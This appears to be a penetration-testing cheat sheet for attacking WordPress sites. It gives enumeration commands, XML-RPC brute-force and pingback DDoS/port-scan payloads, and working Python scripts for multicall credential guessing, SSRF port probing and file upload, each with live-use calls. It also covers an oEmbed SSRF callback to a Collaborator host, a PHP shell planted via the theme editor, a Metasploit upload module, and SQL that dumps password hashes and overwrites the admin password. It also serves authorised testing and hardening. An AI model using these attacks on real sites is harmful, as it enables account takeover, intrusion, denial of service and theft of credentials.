# WordPress

## Basic Information

**Uploaded** files go to: <http://10.10.10.10/wp-content/uploads/2018/08/a.txt>\
**Theme files live in /wp-content/themes/,** so if you modify a PHP file of the active theme to get RCE, that is the path you will reach it through. For example, with the theme twentytwelve you can access the 404.php file at [/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\
Another useful URL could be: /wp-content/themes/default/404.php

In **wp-config.php** you can find the database credentials (`DB_USER`/`DB_PASSWORD`, frequently the MySQL root account) together with the authentication keys and salts.

Default login paths to check: ***/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/***

## **Enumeration**

```bash
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap --url http://www.domain.com --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Random user agent, enumerate all plugins, brute force the discovered users and look up vulnerabilities with a free WPScan API token (limited number of lookups per day)
#You can brute force a specific user (e.g. admin) with "-U admin"
```

### Information Disclosure

Inside the Wordpress folder try to access:

* ***/wp-json/wp/v2/users*** -- lists users (slug, display name), leaking valid usernames for brute force
* ***/wp-json/wp/v2/pages*** -- page objects can leak internal IP addresses or hostnames in fields such as `guid` or `link`

### XML-RPC

If `xmlrpc.php` is enabled you can use it to brute-force credentials, or make the server send requests to other hosts (DoS amplification, internal port scanning).

To check whether it is enabled, POST this request to ***/xmlrpc.php***:

#### Check

```markup
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
```

![](https://h3llwings.files.wordpress.com/2019/01/list-of-functions.png?w=656)

#### Credentials Bruteforce

***wp.getUsersBlogs***, ***wp.getCategories*** or ***metaWeblog.getUsersBlogs*** are some of the methods that require authentication and can therefore be used to brute-force credentials. If you find any of them in the list, send something like:

```markup
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
```

If the credentials are not valid, the response is still HTTP 200 but carries a fault (code 403) with the message *"Incorrect username or password."*; a valid pair returns the user's blogs instead.

There is also a **faster way** to brute-force credentials using **`system.multicall`**, which lets you try several credential pairs in a single request. Note that since WordPress 4.4, once an authentication fails inside a request every later authenticated call in the same multicall is rejected without being checked, so this trick only speeds things up against older installs.

![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MLAfgNVMwHXqnouOUJz%2Fuploads%2FKeKI5ilkM4UrBzaPI4Wl%2Ffile.jpeg?alt=media)
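The following is an added example (not code from the original page) of the `system.multicall` technique: it wraps one `wp.getUsersBlogs` call per credential pair in a single request and then reads back which pairs authenticated, using only the Python standard library. The target IP, the credential list and the sample response are constructed for illustration; the response mirrors the shape WordPress's `IXR_Server::multiCall` produces (a one-element array for a successful sub-call, a `faultCode`/`faultString` struct for a failed one).

```python
# Added example, not code from the original page: try several WordPress
# credential pairs in one system.multicall request and read back which ones
# authenticated. Standard library only. The target URL, credentials and the
# sample response below are constructed for illustration.
import urllib.request
import xmlrpc.client

AUTH_METHOD = "wp.getUsersBlogs"  # any method that logs in works here


def build_multicall(candidates):
    """Wrap one AUTH_METHOD call per (username, password) pair in a
    system.multicall; xmlrpc.client.dumps serialises the list of
    {"methodName", "params"} structs in the shape the spec requires."""
    calls = [{"methodName": AUTH_METHOD, "params": [user, password]}
             for user, password in candidates]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def parse_multicall(response_xml, candidates):
    """WordPress (IXR_Server::multiCall) answers each sub-call with either a
    one-element array holding the real result or a struct carrying
    faultCode/faultString; a fault (403) means the credentials were wrong."""
    (results,), _ = xmlrpc.client.loads(response_xml)
    return [pair for pair, result in zip(candidates, results)
            if not (isinstance(result, dict) and "faultCode" in result)]


def post_xmlrpc(url, body):
    """POST an XML-RPC body to /xmlrpc.php and return the response text."""
    req = urllib.request.Request(url, data=body.encode(), method="POST",
                                 headers={"Content-Type": "text/xml"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode()


# Constructed response for three attempts; only the second pair is valid.
SAMPLE_RESPONSE = """<?xml version="1.0"?>
<methodResponse><params><param><value><array><data>
  <value><struct>
    <member><name>faultCode</name><value><int>403</int></value></member>
    <member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
  </struct></value>
  <value><array><data>
    <value><array><data>
      <value><struct>
        <member><name>isAdmin</name><value><boolean>1</boolean></value></member>
        <member><name>url</name><value><string>http://10.10.10.10/</string></value></member>
        <member><name>blogid</name><value><string>1</string></value></member>
        <member><name>blogName</name><value><string>Target blog</string></value></member>
        <member><name>xmlrpc</name><value><string>http://10.10.10.10/xmlrpc.php</string></value></member>
      </struct></value>
    </data></array></value>
  </data></array></value>
  <value><struct>
    <member><name>faultCode</name><value><int>403</int></value></member>
    <member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
  </struct></value>
</data></array></value></param></params></methodResponse>
"""

if __name__ == "__main__":
    creds = [("admin", "admin"), ("admin", "Summer2024!"), ("editor", "password")]
    print(build_multicall(creds))
    print(parse_multicall(SAMPLE_RESPONSE, creds))  # -> [('admin', 'Summer2024!')]
    # Live use: parse_multicall(post_xmlrpc("http://10.10.10.10/xmlrpc.php",
    #                                        build_multicall(creds)), creds)
```

Against a WordPress 4.4 or newer target, only the first sub-call of each request is really checked, so split the wordlist into one request per attempt (or per user) instead of relying on the multicall speed-up.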

#### DDoS or port scanning

If you find the method ***pingback.ping*** in the list, you can make the WordPress instance send an HTTP request to an arbitrary host/port.\
This can be abused to make **thousands** of WordPress **sites** **request** one **location** (a **DDoS** against that location), or to make one **WordPress** instance **scan** an internal **network** for you (any port can be specified).

```markup
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://<YOUR_SERVER>:<PORT>/</string></value></param>
<param><value><string>http://<SOME_VALID_POST_URL_ON_THE_SITE></string></value></param>
</params>
</methodCall>
```

![](/files/-MLAoI4cF9tbrUDZYXxZ)

The **faultCode** in the response tells you what happened: **17** (*the source URL does not contain a link to the target URL*) means WordPress fetched your URL successfully, so the port is **open**; **16** (*the source URL does not exist*) means the fetch failed, so the port is closed or filtered. Other codes (0, 32, 33, 48) refer to the second parameter, so if you see them pick a valid post URL of the target blog before trusting any result. Current WordPress versions validate the source URL with `wp_http_validate_url` and refuse loopback and private addresses, so scanning internal ranges only works against old or misconfigured installs.

Take a look at the use of **`system.multicall`** in the previous section to learn how to pack several pingbacks into one request when causing a DDoS.
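An added example (not code from the original page) that turns the fault-code logic above into a port probe, and that also builds the same `pingback.ping` payload used for the DDoS variant later on the page. It uses the Python standard library; the XML-RPC URL, the internal host and ports, the post URL and the sample fault responses are constructed for illustration, and the fault-code meanings are the ones WordPress's `pingback_ping()` returns.

```python
# Added example, not code from the original page: use pingback.ping as a port
# probe. WordPress fetches the *source* URL (first parameter) itself, and the
# faultCode it returns reveals whether that host:port was reachable from the
# server. Host, ports, post URL and the sample faults below are constructed.
import urllib.request
import xmlrpc.client

# faultCode values from wp_xmlrpc_server::pingback_ping()
FETCHED_NO_LINK = 17      # source was fetched but holds no link to the target
FETCH_FAILED = 16         # "The source URL does not exist." -> fetch failed
TARGET_PROBLEMS = {0, 32, 33, 48}  # the *target* post URL is wrong or already pinged


def build_pingback(source_url, target_post_url):
    """Serialise pingback.ping(source, target); WordPress will GET `source`."""
    return xmlrpc.client.dumps((source_url, target_post_url),
                               methodname="pingback.ping")


def classify(response_xml):
    """Map a pingback response to 'open', 'closed' or 'bad-target'."""
    try:
        xmlrpc.client.loads(response_xml)
    except xmlrpc.client.Fault as fault:
        if fault.faultCode == FETCHED_NO_LINK:
            return "open"
        if fault.faultCode == FETCH_FAILED:
            return "closed"
        return "bad-target"  # fix the second parameter before trusting results
    return "open"  # a registered pingback also proves the fetch succeeded


def probe_ports(xmlrpc_url, host, ports, target_post_url):
    """Ask the WordPress instance at xmlrpc_url to connect to host:port for us."""
    results = {}
    for port in ports:
        body = build_pingback(f"http://{host}:{port}/", target_post_url)
        req = urllib.request.Request(xmlrpc_url, data=body.encode(), method="POST",
                                     headers={"Content-Type": "text/xml"})
        with urllib.request.urlopen(req, timeout=30) as resp:
            results[port] = classify(resp.read().decode())
    return results


def fault_response(code, text):
    """Constructed <methodResponse><fault> in the shape WordPress returns."""
    return xmlrpc.client.dumps(xmlrpc.client.Fault(code, text))


if __name__ == "__main__":
    for code, text in [(17, "The source URL does not contain a link to the target URL."),
                       (16, "The source URL does not exist."),
                       (0, "Is there no link to us?")]:
        print(code, classify(fault_response(code, text)))  # open / closed / bad-target
    # Live use (the last argument must be a real post URL on the blog):
    # probe_ports("http://10.10.10.10/xmlrpc.php", "192.168.1.10", [22, 80, 443],
    #             "http://10.10.10.10/?p=1")
```

Run one probe against a port you know is open (your own listener) before scanning: if that already comes back as `closed`, the target is rejecting non-public addresses and the results for the internal range are meaningless.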

### wp-cron.php DoS

This file usually exists under the root of the WordPress site: `/wp-cron.php`\
When this file is **accessed** a "**heavy**" MySQL **query** is performed, so it can be used by **attackers** to **cause** a **DoS**.\
Also, by default, `wp-cron.php` is triggered on every page load (whenever a client requests any WordPress page), which on high-traffic sites can cause problems (DoS) by itself.

It is recommended to disable WP-Cron (set `DISABLE_WP_CRON` to `true` in wp-config.php) and create a real cron job on the host that runs the scheduled tasks at a regular interval (without causing issues).

#### **Bruteforce**

```markup
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>username</value></param>
<param><value>password</value></param>
</params>
</methodCall>
```

![](/files/-MLAoI4e__veJ5amhl9z)

![](/files/-MLAoI4fTGRS9OkqV90N)

With valid credentials of a user that has the `upload_files` capability (Author or above) you can upload a file; the response contains the path/URL where it was stored (<https://gist.github.com/georgestephanis/5681982>). WordPress checks the extension and MIME type against its allowed list, so a `.php` file is rejected (fault 500, *Sorry, you are not allowed to upload this file type.*) unless unfiltered uploads are enabled on the site.

```markup
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
    <methodName>wp.uploadFile</methodName>
    <params>
        <param><value><string>1</string></value></param>
        <param><value><string>username</string></value></param>
        <param><value><string>password</string></value></param>
        <param>
            <value>
                <struct>
                    <member>
                        <name>name</name>
                        <value><string>filename.jpg</string></value>
                    </member>
                    <member>
                        <name>type</name>
                        <value><string>mime/type</string></value>
                    </member>
                    <member>
                        <name>bits</name>
                        <value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
                    </member>
                </struct>
            </value>
        </param>
    </params>
</methodCall>
```
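An added example (not code from the original page) that builds the `wp.uploadFile` request above and reads the stored location out of the response, using the Python standard library. The credentials, target URL, file bytes and sample response are constructed for illustration; the response has the `id`/`file`/`url`/`type` struct WordPress returns on success.

```python
# Added example, not code from the original page: upload a file with
# wp.uploadFile and read back where WordPress stored it. The credentials,
# target URL and the sample response below are constructed for illustration.
import urllib.request
import xmlrpc.client


def build_upload(username, password, filename, mime_type, content, blog_id=1):
    """Serialise wp.uploadFile(blog_id, user, pass, {name, type, bits});
    wrapping the bytes in xmlrpc.client.Binary makes dumps emit <base64>."""
    media = {"name": filename, "type": mime_type,
             "bits": xmlrpc.client.Binary(content)}
    return xmlrpc.client.dumps((blog_id, username, password, media),
                               methodname="wp.uploadFile")


def parse_upload(response_xml):
    """Return the struct WordPress answers with (id, file, url, type).
    Raises xmlrpc.client.Fault on rejection, e.g. 403 for bad credentials or
    500 "Sorry, you are not allowed to upload this file type." when the
    extension is not in the allowed list."""
    (result,), _ = xmlrpc.client.loads(response_xml)
    return result


def upload_file(xmlrpc_url, username, password, filename, mime_type, content):
    """POST the upload to /xmlrpc.php and return the parsed result struct."""
    body = build_upload(username, password, filename, mime_type, content)
    req = urllib.request.Request(xmlrpc_url, data=body.encode(), method="POST",
                                 headers={"Content-Type": "text/xml"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return parse_upload(resp.read().decode())


# Constructed response in the shape wp.uploadFile returns on success.
SAMPLE_RESPONSE = xmlrpc.client.dumps(
    ({"id": "42", "file": "filename.jpg",
      "url": "http://10.10.10.10/wp-content/uploads/2018/08/filename.jpg",
      "type": "image/jpeg"},),
    methodresponse=True)

if __name__ == "__main__":
    body = build_upload("admin", "Summer2024!", "filename.jpg", "image/jpeg",
                        b"\xff\xd8\xff\xe0 constructed jpeg bytes")
    print(body)
    print(parse_upload(SAMPLE_RESPONSE)["url"])
    # Live use: upload_file("http://10.10.10.10/xmlrpc.php", "admin", "Summer2024!",
    #                       "filename.jpg", "image/jpeg", open("filename.jpg", "rb").read())
```

The `url` member is the path to request afterwards; if the call raises a 500 fault about the file type, the server is enforcing its extension whitelist and you need another route (theme editor, plugin upload) for code execution.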

#### DDOS

```markup
<methodCall>
    <methodName>pingback.ping</methodName>
    <params>
        <param><value><string>http://target/</string></value></param>
        <param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
    </params>
</methodCall>
```

![](/files/-MLAoI4gV0dF4w8iq-x0)

### /wp-json/oembed/1.0/proxy - SSRF

Try to access <https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net> and the WordPress site may make a request to your server (check your Collaborator or listener for the callback).

This is the response when it doesn't work:

![](/files/-MLAoI4hKAW_MsFNBPhj)

### SSRF

{% embed url="<https://github.com/t0gu/quickpress/blob/master/core/requests.go>" %}

This tool checks whether the **pingback.ping** method and the **/wp-json/oembed/1.0/proxy** endpoint are available and, if so, tries to exploit them.

## **Panel RCE**

#### **Modifying a PHP file of the theme in use (admin credentials needed)**

Appearance → Editor → 404 Template (at the right)

Replace the content with a PHP shell:

![](/files/-MLAoI4i0zbLBrfWfcdN)

Then work out the URL of the edited file (theme files live under /wp-content/themes/<theme>/). In this case it is: <http://10.11.1.234/wp-content/themes/twentytwelve/404.php>. If the Editor entry is missing from the Appearance menu, `DISALLOW_FILE_EDIT` is set in wp-config.php and this route is closed.

### MSF

You can use:

```
use exploit/unix/webapp/wp_admin_shell_upload
```

to get a session.

## POST

Extract usernames and password hashes:

```bash
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
```

Change the admin password (WordPress still accepts a raw MD5 hash in `user_pass` and upgrades it to its phpass format at the next successful login):

```bash
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
```
